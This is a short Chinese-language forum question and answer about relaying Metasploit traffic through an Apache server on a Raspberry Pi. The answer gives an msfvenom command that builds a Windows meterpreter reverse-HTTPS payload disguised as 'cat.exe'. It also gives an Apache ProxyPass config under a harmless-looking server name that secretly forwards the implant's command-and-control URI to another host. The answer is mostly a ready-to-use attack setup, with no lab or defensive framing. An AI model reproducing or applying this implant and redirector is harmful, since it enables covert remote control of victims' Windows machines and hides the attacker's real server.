我想在家里设置一个静态 Apache 网络服务器,将所有传入的 Metasploit 连接转发到另一个 IP。这可能吗?如果可以,怎么做?如果有帮助,我希望在 RasPi B+ 上运行 Apache 服务器。
答案1
首先,创建有效载荷:
msfvenom -p windows/meterpreter/reverse_https LHOST=<IP OR DOMAIN NAME> LPORT=<PORT or 443> LURI=/myawesomecnc -o /root/cat.exe
最重要的部分是您需要设置为特定资源的 LURI。有效负载生成的所有流量都将定向到此 URI。
完成后,使用 Apache 或 nginx 中的 ProxyPass 指令仅将 /myawesomecnc 的流量转发到您想要的特定主机。以下是 Apache 的示例:
<VirtualHost *:443>
ServerName www.totallyharmless.com
...
ProxyPass /myawesomecnc/ http://1.2.3.4/myawesomecnc/
ProxyPassReverse /myawesomecnc/ http://1.2.3.4/myawesomecnc/
...
</VirtualHost>